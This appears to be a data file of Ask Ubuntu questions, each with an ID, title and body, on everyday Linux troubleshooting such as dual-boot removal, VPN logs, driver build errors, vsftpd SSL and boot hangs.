411972	i want to uninstall ubuntu but my mac reads my live usb as if it was the linux partition not the installer ?	so i am trying to uninstall ubuntu linux from my mac . i am trying to use the live usb to go into the gparted app to delete the linux partitions . although , something strange is happening . when my live usb is plugged in , and i restart my macbook and hold the option key in the start up screen , i get two hard drive icons . one says windows ( which is the linux partition ) , and the other one is refit . i choose refit and then i choose boot from legacy ( it is the new icon that pops out and it even has an icon telling me it is an external not internal hard drive ) . however , when i enter it , the linux installer screen does not show up . instead , i am asked if i want to boot linux normally , recovery mode , and all those other options . when i choose to start normally , it takes me to my old login screen and has my username and all my ** in there . it is not the linux installer from my live usb ! it is the actual linux partition . the same happens when i choose all other linux icons i get on my start up screen . why is this ? why is linux reading my live usb like as if it were the actual linux partition on my mac ? i really do want to uninstall linux from my mac . ( i set it to dual booted . and i have uninstalled it before and installed it again using the same live usb . it worked before why not 6 months later ? )
411973	how can i identify untrusted files in updater ?	when i try to update the 'updater ' notifies me that some files are from untrusted sources . how can i identify those files ?
411974	fatal error when launching startx : server is already active	i 'm running ubuntu 12.04 . earlier today i launched startx and got a blank wallpaper-like screen with nothing on there . i thought maybe it was taking time to load but it would just remain stuck there . looking for a way to get back to the command prompt , i pressed ctrl+alt+f6 and got back to the command prompt . later today , i tried launching startx again and got this error : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . please consult the the x.org foundation support at http : //wiki.x.org for help . ddxsiggiveup : closing log invalid mit-magic-cookie-1 keyinvalid mit-magic-cookie-1 keyxinit : giving up xinit : unable to connect to x server : resource temporarily unavailable xinit : server error someone here suggested to type in sudo stop lightdm and someone else over here suggests to type sudo service lightdm stop , however both give me the following message : stop : unknown instance : i tried killall x which gives me : x : no process found i 'm not so sure about deleting /tmp/.x0-lock because the first link up there says that deleting it just gives you the error message can not create file /tmp/.x0-lock instead . by the way cat /tmp/.x0-lock gives me : 14275 but that process does n't seem to show up in top , although it may be way at the bottom , i 'm not sure how to scroll down . what should i try next ?
411976	how to debug vpn connection issues ( 13.10 )	i 'm trying to connect to a work vpn , but every time i attempt to connect it fails . the vpn has been configured in the network manager ui and the connection is being started from there too . i have checked the system logs and see the following : jan 28 08:29:09 cwlt networkmanager [ 751 ] : < info > starting vpn service 'pptp ' ... jan 28 08:29:09 cwlt networkmanager [ 751 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 6383 jan 28 08:29:09 cwlt networkmanager [ 751 ] : < info > vpn service 'pptp ' appeared ; activating connections jan 28 08:29:09 cwlt networkmanager [ 751 ] : < info > vpn plugin state changed : starting ( 3 ) jan 28 08:29:09 cwlt networkmanager [ 751 ] : < info > vpn connection 'vpn ' ( connect ) reply received . jan 28 08:29:09 cwlt pppd [ 6387 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . jan 28 08:29:09 cwlt pppd [ 6387 ] : pppd 2.4.5 started by root , uid 0 jan 28 08:29:09 cwlt pppd [ 6387 ] : using channel 10 jan 28 08:29:09 cwlt pppd [ 6387 ] : using interface ppp0 jan 28 08:29:09 cwlt pppd [ 6387 ] : connect : ppp0 < -- > /dev/pts/4 jan 28 08:29:09 cwlt networkmanager [ 751 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) jan 28 08:29:09 cwlt networkmanager [ 751 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . jan 28 08:29:09 cwlt networkmanager [ 751 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... jan 28 08:29:09 cwlt pptp [ 6391 ] : nm-pptp-service-6383 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated jan 28 08:29:09 cwlt whoopsie [ 1138 ] : online jan 28 08:29:09 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' jan 28 08:29:09 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply jan 28 08:29:09 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . jan 28 08:29:10 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' jan 28 08:29:10 cwlt whoopsie [ 1138 ] : online jan 28 08:29:10 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . jan 28 08:29:10 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 42341 ) . jan 28 08:29:49 cwlt networkmanager [ 751 ] : < warn > vpn connection 'fluency labs vpn ' ( ip config get ) timeout exceeded . jan 28 08:29:49 cwlt networkmanager [ 751 ] : < info > policy set 'vm529841-5g ' ( eth1 ) as default for ipv4 routing and dns . jan 28 08:29:49 cwlt pppd [ 6387 ] : terminating on signal 15 jan 28 08:29:49 cwlt pppd [ 6387 ] : connection terminated . jan 28 08:29:49 cwlt avahi-daemon [ 709 ] : withdrawing workstation service for ppp0 . jan 28 08:29:49 cwlt networkmanager [ 751 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) jan 28 08:29:49 cwlt pppd [ 6387 ] : child process /usr/sbin/pptp xxx.xxx.xxx.xxx -- nolaunchpppd -- loglevel 0 -- logstring nm-pptp-service-6383 ( pid 6389 ) terminated with signal 15 jan 28 08:29:49 cwlt pppd [ 6387 ] : exit . jan 28 08:29:49 cwlt pptp [ 6391 ] : nm-pptp-service-6383 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error jan 28 08:29:49 cwlt pptp [ 6391 ] : nm-pptp-service-6383 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log jan 28 08:29:49 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) jan 28 08:29:49 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' jan 28 08:29:49 cwlt pptp [ 6405 ] : nm-pptp-service-6383 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) jan 28 08:29:54 cwlt networkmanager [ 751 ] : < info > vpn service 'pptp ' disappeared i 've deliberately hidden the ip-address here so do n't worry about that . i do n't really know what is going wrong here , so if someone could point me in the right direction that would be great .
411982	found a hidden port . . . what now ?	i ran rkhunter and found an open hidden port . how do i close a port that is not listed with the netstat or fuser command ? it is hidden from these which is why it was flagged . aside from blocking the port with ufw or iptables , how can i remove or close this port ? starting tcp checking found hidden port that not appears in netstat : 38598 starting udp checking
411983	how to access amazon ec2 instance from ubuntu 13.10 ?	i have an amazon ec2 ( windows ) instance which has been created for me and i have public dns , public ip and the public key . i would like to rdp to this instance from ubuntu 13.10 . i have recently downloaded rdesktop but do n't know how to connect to ec2 instance through it . would someone please be able to lay down step-by-step instructions on how to do it ? i am totally new to linux . in rdesktop , when i choose the option 'rdp ' there are 3 tabs displayed - basic , advanced and ssh with various options in them . i am a little confused on how to go ahead with the things i have with me ( public dns , public ip and the public key ) . any help would be greatly appreciated .
411989	lubuntu ( lxde ) and dolphin filemanager	i 'm using lubuntu 13.10 . i 'm really satisfied with lxde except for the file manager pcmanfm which not enough features . so i 've decided to switch to dolphin which i 've downloaded using synaptic . the thing now is : the only way to start dolphin is by typing its name into the terminal even though there 's a ( not responding ) shortcut in the panel . any ideas ? ? got the same issue with gnome and konqueror if that helps ... thanx
411990	vlc do not plays video files	vlc do not play any kind of video file . i will however start and stop correctly as open without any order to play anything . it used to work great before ubuntu 12.04 reinstall , but now i face such strange problem . symptoms : - vlc do not play any kind of video . just opens it and stays frozen on first second of file . - vlc opens an icon in notification bar just as it does regularly , but this time there is not an option to close it . menu over there opens but do not respond . - at any attempt to play a video file vlc will open another `` dead '' icon in notification bar . attempts of solution : at first i thought it is lack of codecs , so i installed ubuntu restricted extras . it did not work at all . i removed vlc .config folder and reinstalled vlc through apt-get install vlc . it did not work at all . i removed vlc through apt-get remove -- purge vlc followed by apt-get autoremove , and reinstalled it using terminal . it did not work at all . problem stands and any of those attempts did n't fixed the issue .
411991	make desktop file executable via double click	i placed a text file on the desktop and made it executable via right click / permissions . now i would expect it to be executed after double-clicking it , but it wo n't , it just keeps getting opened by gedit . what can i do ?
411992	how to track down the copy and move operations of files and folders ?	i use drag and drop to copy and move files . one disadvantage of that is files might end up to the wrong places . so , let 's say i copied/moved many files and folders to multiple different destinations . how can i track down where everything ended up to make sure that everything was copied/moved to the right places ?
411994	how to connect nokia n79 to internet using usb cable ?	as instructed by you i have created new thread and here 's the doubt i am using nokia n79 phone . data plan is 2gb and speed is 2g . i can see in connection manager that one access point name : - modem is trying to access internet but it is unable to connect . the process for connecting goes on and on . when i connect my phone i have to select any mode i am selecting pcsuite . what settings should i configure in edit connections so that i can connect to internet . i am still able to connect and use my phone with nokia pcsuite in windows but not in ubuntu desktop 12.04
411995	phonebook maintenance by pc	i try to maintain phonebook of my sgh-e250 cellphone using bluetooth and corresponding tool of 64 bit ubuntu 12.4 . partial results : nautilus works correctly using bluez wammu shows several data of the phone and possibly could exchange files , but not phonebook ( it reports internal phone error ; the possible reason is described at libsyncml : the phone gives unusual answer in some cases â this property is not built into wammu ) the phone can send phonebook into pc ( after allow file input via terminal command gnome-file-share-properties ) now i try openobex . it was downloaded by synaptic package manager ( with dependencies ) , but at start shows an empty root directory and nothing more . on the troubleshoot page ( http : //www.tech-edv.co.at/00_home/20_programmierung/50_freie~20software/10_obextool/40_troubles/trouble.php ) there are steps for check . 1 ) ensure that the communication software obexftp is installed correctly and works , enter on command line : obexftp -h âś . it works for me and ofexftp -l shows my phone ( if it is not connected by nautilus ) 2 ) check if the command wrapper etc/obexwrap.sh is executable on command line ... i have no obexwrap.sh in any library . i have no idea how to step forward . thank you ideas . i have found the solution with bluez ( and nautilus ) . when pc and phone know each other the bluetooth drop down menu of the system tray shows the phone . if the mouse is on it two item submenu appears : send and browse ( or something similar ; browse is good for gammu connection , but now it has no importance ) . send starts the file browser ; after mark of ( multiple ) files select button starts the transfer to phone . if .vcf file is marked , it goes into phonebook of the phone . ( i tried it with files having single cards , corresponding to the behaviour of the opposit direction transfer . )
412002	how to load xampp graphical ui ?	i just install xampp but maybe somewhere i missed it because i ca n't load any xampp gui . also the browsers is not working local host url . thank you
412003	query on partition size	have provided 25gb ( / ) , 8gb ( swap ) and left the balance space ( around 280gb ) as it is with out formatting during the installation . what i did is correct or will this be effected in future for any reason .
412004	ubuntu 12.04 black screen after driver instal	pls help ! having trouble installing proprietary drivers , every time i install it via driver manager or from amd website using this guide https : //help.ubuntu.com/community/binarydriverhowto/amd it goes to blackscreen after reboot . i tried defrent versions of driver , though it would be great if i culd get 13.12 version working . graphics card hd5470 have no integrated graphics , notebook asus x52de .
412009	open cl in intel	how to compile and run open cl codes on intel i5 processors having intel hd 4000 gpu unit ? ? ? open cl has been istalled in /opt/intel/opencl and versionis ubuntu 12.04 . any help would be of great help ... thanks
412015	sharing 2nd hard disk drive in ubuntu server 12.4	greetings to all the techies and gurus ! i have ubuntu server 12.4 lts with samba server installed . i have a 2nd 2tb hdd . i want to create a folder in the 2nd hdd and share it with windows pc 's ... . how do i do it ? appreciate all your help peepz.. chers
412021	installing ubuntu on windows 8.1	i am using windows 8.1 currently on a toshiba satellite p755 ( core i5 , 600gb hdd ) . i created an unallocated space of 30gb to install ubuntu . but when i try to install , ubuntu says it is unused . then i went back to windows and created a new volume on ubuntu again but it only sees the partition which has the windows and the other partitions are combined together with the 30gb is not seen and also my d and e drives are combined . can anyone help me out with this . i have tried googling ; where people say all my hdd need to be on a primary rather basic but not dynamic mbr . how can i convert my hdd to primary so i can install ubuntu if that is the case ?
412023	boot manager multiple entries	i have 2 ssds , one 256gb and one 24gb . on the 256gb drive i have windows 8 installed . on the 24gb i have ubuntu 12.04 installed . when i hit f12 on my keyboard during startup , i am taken to the boot manager of my system where i have the following options : why are there two entries for ubuntu when i have only the one installation and how can i remove one ? when i try to boot into `` ubuntu '' ( the third option ) , the screen turns off .
412032	install ubuntu on a laptop with a pre-installed windows 8	i ordered an xps 15 l521x laptop . it 's embedded with a 500 go hardrive + a 32 go ssd m-sata . windows 8 is pre-installed . i 'd like to install ubuntu on to this laptop while retaining the pre-installed windows . i suppose that the ssd is already used by windows . i 'd need to partition the ssd to install the ubuntu on it too ( only the '/ ' dir , '/home ' and '/tmp ' would go to the classical hdd ) do you see any difficulties on doing it ?
412033	i ca n't connect to my wireless network	since i upgraded my ubuntu version i just ca n't connect to my home network , even if it appears like available . other machines can connect to it , and mine connects to other networks so i think it might have to do with the connection settings but i 'm not finding any computers ... . thank you very much
412036	e : the value 'raring-updates ' is invalid for apt : :default-release as such a release is not available in the sources	first it was when i tried to upgrade from 13.04 to 13.10. sudo apt-get check shows : e : the value 'raring-updates ' is invalid for apt : :default-release as such a release is not available in the sources the red circle in notification bar if showing : an error occurred , please run package manager from right-click menu or apt-get in a terminal to see what is wrong ...
412039	how to restrict the access to the certain domains during work hours automatically	i know about selfcontrol app , but it has to be started everytime and the block hours to be set . i want for example to forbid loading certain sites during work hours , but make it possible during the rest . i want to set it once and forget . it has to do the switch automatically everyday . what would be the easier way to do this , considering that i 'm a super newbie .
412041	generating .ovpn config for android phone	i 'm using an ubuntu server and i wanted to use openvpn for my server and my android phone . i installed openvpn connect for my phone and the software needs *.ovpn file from my server . how can i generate this file ? and how can i enable authentication ? i 've use openvpn access server but it gives only two users licensee to authenticate but i need more . i 've searched through internet but all training i 've found was how to generate client.key , client.crt and ca.crt but i ca n't use them for my android phone .
412045	making broadcom bcm4313 driver gives error : implicit declaration of function ‘create_proc_entry’	i’m trying to build a driver for my bcm4313 wireless network adapter using these instructions from broadcom . i 'm getting this error : kbuild_nopedantic=1 make -c /lib/modules/`uname -r`/build m=`pwd` make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-15-generic' cfg80211 api is prefered for this kernel version using cfg80211 api cc [ m ] /home/keroles/hybrid_wl/src/wl/sys/wl_linux.o /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c : in function ‘wl_tkip_printstats’ : /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3246:7 : warning : passing argument 1 of ‘wl- > tkipmodops- > print_stats’ from incompatible pointer type [ enabled by default ] wl- > tkip_bcast_data [ idx ] ) ; ^ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3246:7 : note : expected ‘struct seq_file *’ but argument is of type ‘char *’ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3249:4 : warning : passing argument 1 of ‘wl- > tkipmodops- > print_stats’ from incompatible pointer type [ enabled by default ] wl- > tkipmodops- > print_stats ( debug_buf , wl- > tkip_ucast_data ) ; ^ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3249:4 : note : expected ‘struct seq_file *’ but argument is of type ‘char *’ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c : in function ‘wl_reg_proc_entry’ : /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3470:2 : error : implicit declaration of function ‘create_proc_entry’ [ -werror=implicit-function-declaration ] if ( ( wl- > proc_entry = create_proc_entry ( tmp , 0644 , null ) ) == null ) { ^ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3470:22 : warning : assignment makes pointer from integer without a cast [ enabled by default ] if ( ( wl- > proc_entry = create_proc_entry ( tmp , 0644 , null ) ) == null ) { ^ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3475:16 : error : dereferencing pointer to incomplete type wl- > proc_entry- > read_proc = wl_proc_read ; ^ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3476:16 : error : dereferencing pointer to incomplete type wl- > proc_entry- > write_proc = wl_proc_write ; ^ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.c:3477:16 : error : dereferencing pointer to incomplete type wl- > proc_entry- > data = wl ; ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/keroles/hybrid_wl/src/wl/sys/wl_linux.o ] error 1 make [ 1 ] : *** [ _module_/home/keroles/hybrid_wl ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-15-generic' make : *** [ all ] error 2 i do n't know why , any ideas ?
412046	unable to use intellij idea keyboard shortcuts on ubuntu	i am very new to ubuntu , and i 'm having a problem that i do n't know how to get it fixed . i even tried looking it up on the web for answers , but maybe i do n't know the right terms to search for it . i work with intellij idea , an application for development . and i am very used to the keyboard shortcuts , but when i made the switching from windows xp to ubuntu 13.10 , some shortcuts do n't work anymore . for example , such as ; ctrl + alt + > ( left arrow ) alt + f8 is there any reason as to why ? and are there any fix for this ? or maybe just something to guide me on my searching thank you all very much in advance .
412049	making certain apps open everytime at certain places ?	i want to make certain apps always open at certain position ( for example sticked to the left edge of the second monitor ) and at certain desktop or visible on all desktops . is there an easy way to automate this ?
412050	switching from linux mint 13 to ubuntu 12.04 - saving programs	i am still fairly new to linux , and i was planning on switching from linux mint 13 ( which i 'm currently using ) to ubuntu 12.04 . i have quite a few programs that i installed on linux mint outside of the software center - like statase 12 - and i was wondering , if i install ubuntu 12.04 , will these programs be deleted ? is there a way to indicate that i want to keep these programs during the ubuntu install ? thanks !
412052	window minimize does not work	so after installing gnome 3.10 on my ubuntu 13.10 and playing around with it my unity desktop is a bit bugged . when i try to minimize a window , nothing happens . now , when i press the windows key and alt , the window minimizes with a bit of graphical lag seen . but doing this multiple times will crash the whole de pretty much . where could i start looking from for the cause of the problem ?
412053	ubuntu server 12.04 : boot hangs with error `` udevd [ 538 ] inotify_add_watch ( ... ) failed : invalid argument	i 'm currently faced with the following situation : when rebooting a ubuntu 12.04 lts server after updating ( it ran perfectly for a year or so , i updated it around two months ago and rebooted with no problems , now about two weeks ago i again did an apt-get update/upgrade ) , it hangs before i even get to the grub menu-selection with the following message : udevd [ 538 ] inotify_add_watch ( 6 , /dev/dm-2 , 10 ) failed : invalid argument done . the server has 4 harddrives , of which 3 are organized into an lvm group ( this was not done by me , so i have no details on how this was performed , if needed i can supply the output of vgdisplay , which looks fine to me ) and the last one ist used to boot the system . when booting from a ubuntu 12.04 live cd ( where i btw also get the udev error , but it only stalls the boot process for about 10 seconds ) , i can mount all the partitions without problems by doing mount /media/ubuntuserver /dev/mapper/ubuntuserver-root ( contains the root partition ) mount /media/sda1 /dev/ubuntuserver/boot ( contains the /boot directory ) fsck reports no errors whatsoever on any of these disks . in similar threads i read that the installation of `` cryptsetup '' fixes the udev error for some , so i tried to do a chroot : boot from live cd sudo bash mount /media/ubuntuserver /dev/mapper/ubuntuserver-root mount /media/sda1 /dev/ubuntuserver/boot mount -o bind /proc /media/ubuntuserver/proc mount -o bind /dev media/ubuntuserver/dev mount -o bind /dev/pts /media/ubuntuserver/dev/pts mount -o bind /sys /media/ubuntuserver/sys chroot /media/ubuntuserver /bin/bash swapon /dev/mapper/ubuntuserver-swap_1 but i 'm unable to finish an apt-get upgrade ( update works fine ) , since whenever the post-installation triggers are to be processed , the systems just hangs and does nothing , no errors , no nothing . cancelling this process with ctrl+c finally gets me to the part where initramfs-update is called , which also stalls . when chrooting to the system from a 2nd shell , i see the new initrd file in /boot with 0 bytes . after some additional fiddling i found out that when calling update-initramfs -u -v it stalls at the line building cpio /boot/initrd.img-2.6.32-24-server.new initramfs /sda1 ist mounted to /boot , on a 2nd shell i see the created file with a size of 0 bytes , and that 's it . any hint on what i 'm doing wrong ? any hint on what else i could try ? i 'm running out of ideas ... thank you in advance and best regards manuel
412057	mysterious multicast packets after bridging a bond0	i 've got 2 interfaces eth0 and eth1 in a bonding ( mode 4 ) . now i want working with kvm and let the instances communicate over a bridge br0 . now my config changes . from this ... : auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master bond0 auto bond0 iface bond0 inet static address 172.16.1.4 netmask 255.255.0.0 network 172.16.0.0 gateway 172.16.1.1 broadcast 172.16.255.255 dns-nameservers 172.16.1.2 172.16.1.3 bond-mode 802.3ad bond-miimon 100 bond-lacp-rate 1 bond-slaves eth0 eth1 to that : auto bond0 iface bond0 inet manual bond-mode 802.3ad bond-miimon 100 bond-lacp-rate 1 bond-slaves eth0 eth1 auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master bond0 auto br0 iface br0 inet static address 172.16.1.4 netmask 255.255.0.0 network 172.16.0.0 gateway 172.16.1.1 broadcast 172.16.255.255 dns-nameservers 172.16.1.2 172.16.1.3 bridge-ports bond0 bridge-fd 9 bridge-hello 2 bridge-maxage 12 bridge-stp on everything works fine except these notification from the firewall : source destination priority category note message 224.0.0.22 info ipmac-binding drop packet drop packet ge2-0.0.0.0-c8 : cc:6f:8e : d7:2f all interfaces have the same mac : ifconfig | grep hwaddr bond0 link encap : ethernet hwaddr c8 : cc:6f:8e : d7:2f br0 link encap : ethernet hwaddr c8 : cc:6f:8e : d7:2f eth0 link encap : ethernet hwaddr c8 : cc:6f:8e : d7:2f eth1 link encap : ethernet hwaddr c8 : cc:6f:8e : d7:2f in a tcpdump i do n't see any suspicious packages , arp table and routing table are looking fine ... any ideas ?
412058	my laptop boots with full screen brightness and full keyboard backlight	i meets a problem that my laptop boots with full screen brightness and full keyboard backlight . according to a post on ubuntu forum for macbook ( http : //ubuntuforums.org/showthread.php ? t=1987790 ) , it is possible to fix it by editing /etc/rc.local . however , it do not work on my asus zenbook ux32vd . moreover , i want to disable the touchpad by default . could you please tell me the methods to deal with these problems ? thank you for your attention . related websites : http : //ubuntuforums.org/showthread.php ? t=1987790 http : //ubuntuhandbook.org/index.php/2013/10/save-blacklight-brightness-ubuntu-1310/
412064	what is the path to adb binary installation	in a executable script , i need to add path to adb binary as follows # 1 . configure where your adb binary is installed export adbcmd= '' < path_to_adb_binary > '' so what is the path in ubuntu 12.10 ?
412065	my ubuntu software center window freezes ?	the window keeps on loading , i 've kept waiting for one hour.i 'm using ubuntu 13.04.i 've used sudo update-software-center but it does not work . on running the command : software-center ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk- widgets.css:202:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:209:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:217:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:246:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:253:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:482:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:501:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:516:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:529:26 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1162:22 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1167:22 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1212:48 : expected ' ) ' ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1223:48 : expected ' ) ' ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1235:48 : expected ' ) ' ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1247:48 : expected ' ) ' ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1429:18 : not using units is deprecated . assuming 'px ' . ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1437:18 : not using units is deprecated . assuming 'px ' . ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1465:26 : not a number ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1474:26 : not a number ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1490:18 : not using units is deprecated . assuming 'px ' . ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1535:5 : '/* ' in comment block ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1921:22 : 'none ' is not a valid color name ( software-center:4276 ) : gtk-warning ** : theme parsing error : gtk- widgets.css:1928:22 : 'none ' is not a valid color name 2014-01-28 18:48:02,299 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-01-28 18:48:05,005 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-01-28 18:48:05,038 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software- center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-01-28 18:48:05,057 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-01-28 18:48:05,057 - root - error - could not find any typelib for launchpadintegration 2014-01-28 18:48:05,308 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) any help is appriciated . thank you !
412067	wubi : no wubildr ; prefix not set error on boot	i installed ubuntu using wubi , whenever i start my laptop an choose ubuntu ; i 'm get this error ntfs5 : no wubildr and ntfs : prefix not set this error screen flash just half a second and is show ubuntu 's pink screen then turns black and nothing happened i waited for some 15-20 min it stayed same.. no magic ; i even saw and searched all wubi errors but could n't find solution , that 's why i 'm posting this question , pls help.. thank you..
412070	vsftpd will not start with ssl enabled	i am having a problem trying to set up an ftps server on my ubuntu server 13.10 machine . i have vsftpd installed . when i try to start the service using sudo service vsftpd start i get : vsftpd start/pre-start , process 5922 however , ps aux | grep vsftpd yields nothing . i found this error in /var/log/dmesg : [ 11.212518 ] init : vsftpd main process ( 1137 ) terminated with status 2 the result of sudo vsftpd is : 500 oops : ssl : can not load rsa certificate the permissions on \etc\vsftpd\vsftpd.pem are currently set to : -rw-r -- r -- 1 root root 1708 jan 28 05:15 vsftpd.pem i tried changing the permissions to 777 and it still did n't work . i used the following command to create the certificate : openssl req -x509 -nodes -days 720 -newkey rsa:2048 -keyout /etc/vsftpd/vsftpd.pem -out /etc/vsftpd/vsftpd.pem my /etc/vsftpd.conf is as follows : listen=yes anonymous_enable=no write_enable=yes local_umask=022 dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=no xferlog_file=/var/log/vsftpd.log chroot_local_user=yes secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/vsftpd/vsftpd.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key listen_port=2000 ssl_enable=yes allow_anon_ssl=no force_local_data_ssl=yes force_local_logins_ssl=yes ssl_tlsv1=yes ssl_sslv2=no ssl_sslv3=no hide_ids=yes max_per_ip=10 max_clients=10 port_enable=yes pasv_enable=yes pasv_min_port=11000 pasv_max_port=11030 require_ssl_reuse=no any help would be greatly appreciated , as i am officially drawing a total blank . thanks in advance . update : i just tried it with : rsa_cert_file=/etc/ssl/private/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key it worked . so i 'm thinking that i messed up the certificate generation . i do n't really know enough about openssl to figure it out any further .
412078	upstart can not determine daemon 's pid	there is a daemon mydaemon , which has not a very pleasant interface . so that mydaemon-parser.py was written to parse configuration files and start as many mydaemon instances as needed . mydaemon-parser.py use subprocess.call ( ) to call external commands . i found out that mydaemon-parser.py forked 16 times to start one mydaemon instance . how is upstart supposed to determine mydaemon pids . i want to use upstart because mydaemon is not a very stable product . i am tired to start it after it fails . may be there is a better way to keep the service up ?
412079	can i install ubuntu on nokia lumia 610 ?	is ubuntu suportted by windows phone ? ( nokia lumia 610 ) .how it can work and where can i download ?
412080	windows 7 home premium not loading after installing ubuntu 13.10	i have a sony vaio laptop with windows 7 home premium being the default os.after installing ubuntu 13.10 i am not able to boot into windows 7 home premium.whenever i open windows 7 , it tells that there is not folder named the desktop in windows 7.all the shortcuts i had placed on the desktop had vanished and only the recycle bin option remained and when i tried opening the computer , it tells me that it can not opens it.why is it so ? any help given will be highly appreciated . regards , sai sanjeev
412084	mysql query browser or any mysql gui tool in ubuntu	i have installed ubuntu 13.04 and now fully dependent on it . i have worked on mysql query browser in windows to run queries and procedures and programmers , i could not find any other alternatives in ubuntu 13.04 which is fast , lightweight , and simple . i had a look on mysql workbench but forums did n't gave any positive feedbacks regarding workbench as it freezes and complicated to use and run simple procedures . what to use that is similar to query browser in ubuntu .
